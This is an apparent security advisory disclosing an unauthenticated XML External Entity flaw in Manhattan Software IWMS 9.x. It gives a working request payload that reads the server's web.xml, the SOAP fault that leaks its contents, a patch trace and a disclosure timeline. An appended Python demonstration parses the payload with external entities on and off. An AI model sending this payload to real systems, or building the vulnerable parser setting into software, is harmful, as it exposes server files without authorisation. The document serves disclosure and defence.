https://www.osisecurity.com.au/manhattan-software-iwms-integrated-workplace-management-system-xml-external-entity-xxe-injection-file-disclosure.html

Date: 04-Apr-2017
Product: Trimble / Manhattan Software IWMS (integrated workplace management system)
Versions affected: 9.x
Vulnerability: XML External Entity injection (XXE)

Example:

There is an XXE in services such as:

https://[target]/services/WSFUNCTION
https://[target]/services/WSGRID
https://[target]/services/WSLOOKUP
https://[target]/services/WSVALIDATE

The services do not check for an authentication cookie, so the issue is reachable without credentials.

Example request:

POST /services/WSFUNCTION HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: text/xml; charset=UTF-8
Referer: [target]/wrd/run/SPDEMLOGIN
Content-Length: 1119
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///C:/Manhattan/Tomcat/webapps/ROOT/WEB-INF/web.xml" >]><foo>&xxe;</foo>

Server response:

HTTP/1.1 500 Internal Server Error
Date: Mon, 13 Oct 2014 00:44:15 GMT
Server: Apache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 409
Connection: close
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Body>
  <soapenv:Fault>
   <faultcode>soapenv:Client</faultcode>
   <faultstring>{Parser Fatal Error on Line 0, Position 0 }An exception occurred! Type:NetAccessorException, Message:Could not open file: http://java.sun.com/xml/ns/javaee/web-app_3_0.xs</faultstring>
  </soapenv:Fault>
 </soapenv:Body>
</soapenv:Envelope>

(The java.sun.com schema URL in the fault string appears nowhere in the request: it comes from the contents of web.xml, which the parser has opened and processed as the body of the entity. Because parser errors are echoed back in the SOAP fault, the fault message is an error-based channel that leaks what the parser read from the server's filesystem.)

Now patched with an input filter. The same request is now stopped by a servlet filter in front of the services; the filter itself throws while logging the blocked request:

java.lang.NullPointerException
 com.manhattansoftware.web.InjectionAttackFilter.log(InjectionAttackFilter.java:123)
 com.manhattansoftware.web.InjectionAttackFilter.doFilter(InjectionAttackFilter.java:61)
 com.manhattansoftware.web.XFrameFilter.doFilter(XFrameFilter.java:38)

Credit:

Discovered by Patrick Webster

Disclosure timeline:

11-Oct-2014 - Discovered during audit.
14-Oct-2014 - Reported to vendor.
18-Feb-2015 - Vendor released patch.
04-Apr-2017 - Public disclosure.

About OSI Security:

OSI Security is an independent network and computer security auditing and consulting company based in Sydney, Australia. We provide internal and external penetration testing, vulnerability auditing and wireless site audits, vendor product assessments, secure network design, forensics and risk mitigation services. We can be found at http://www.osisecurity.com.au/
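As an added example (not code from the advisory, from OSI Security or from the vendor), the script below builds the same XXE request body as the advisory's request, runs it through a parser configured the way the vulnerable service evidently was (external general entities resolved), through the same parser with external entities turned off, and through a hardened configuration that also rejects any DOCTYPE, and finally pulls the faultstring out of a SOAP 1.1 fault shaped like the 500 response above. It uses only the Python standard library (xml.sax over expat); the secret file, its contents and the sample fault response are constructed stand-ins, and nothing here touches the Manhattan product.

```python
"""Added example, not from the advisory or the vendor: the advisory's XXE
payload run through a parser that resolves external entities and through a
hardened one, plus SOAP faultstring extraction. Stdlib only; the secret
file, its contents and SAMPLE_FAULT are constructed stand-ins."""
import io
import pathlib
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from xml.sax import handler

# Same shape as the advisory's request body; {url} is the SYSTEM identifier.
XXE_TEMPLATE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
    '<!ENTITY xxe SYSTEM "{url}" >]>\n'
    '<foo>&xxe;</foo>'
)

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed SOAP fault in the shape of the advisory's 500 response.
SAMPLE_FAULT = (
    b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soapenv:Body><soapenv:Fault><faultcode>soapenv:Client</faultcode>'
    b'<faultstring>{Parser Fatal Error on Line 0, Position 0 }'
    b'Could not open file: http://schemas.example.com/app.xsd</faultstring>'
    b'</soapenv:Fault></soapenv:Body></soapenv:Envelope>'
)


def build_payload(system_id: str) -> bytes:
    """XXE request body whose entity points at the given SYSTEM identifier."""
    return XXE_TEMPLATE.format(url=system_id).encode("latin-1")


class DoctypeRejected(Exception):
    """Raised by the hardened configuration as soon as a DTD is seen."""


class _TextCollector(handler.ContentHandler):
    """Accumulates character data, i.e. whatever &xxe; expanded to."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


class _NoDoctype:
    """SAX lexical handler that aborts on the DOCTYPE declaration."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not accepted")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_text(xml_bytes: bytes, *, resolve_external: bool, allow_doctype: bool) -> str:
    """Parse with expat via xml.sax and return the document's text content.

    resolve_external=True is the vulnerable setting: expat fetches SYSTEM
    entities (file://, http://) and splices their contents into the document.
    allow_doctype=False additionally rejects any DTD before it is processed.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if not allow_doctype:
        parser.setProperty(handler.property_lexical_handler, _NoDoctype())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def fault_string(soap_response: bytes):
    """Return the <faultstring> of a SOAP 1.1 fault, or None if there is none."""
    root = ET.fromstring(soap_response)
    node = root.find(f".//{{{SOAP_NS}}}Fault/faultstring")
    return None if node is None else node.text


def demo() -> dict:
    """Write a constructed secret file, then run the payload through three
    parser configurations and report what each one yielded."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "app.properties"  # stand-in for web.xml
        secret.write_text("db.password=hunter2", encoding="ascii")
        payload = build_payload(secret.as_uri())  # file:///... URL

        leaked = parse_text(payload, resolve_external=True, allow_doctype=True)
        # First layer: external entities off; the reference is simply dropped.
        quiet = parse_text(payload, resolve_external=False, allow_doctype=True)
        # Second layer: no DTD at all, which also removes entity-expansion DoS.
        try:
            parse_text(payload, resolve_external=False, allow_doctype=False)
            blocked = False
        except DoctypeRejected:
            blocked = True
    return {"vulnerable": leaked, "external_entities_off": quiet, "doctype_rejected": blocked}


if __name__ == "__main__":
    print(demo())
    print(fault_string(SAMPLE_FAULT))
```

The vendor's trace shows a request filter placed in front of the services. The durable fix is in the parser configuration, as in parse_text above: disable external entity resolution and reject DTDs outright, because a pre-parse filter has to recognise every encoding and obfuscation the parser itself will accept, and a filter that throws while logging (as the trace shows) is a crash, not a rejection.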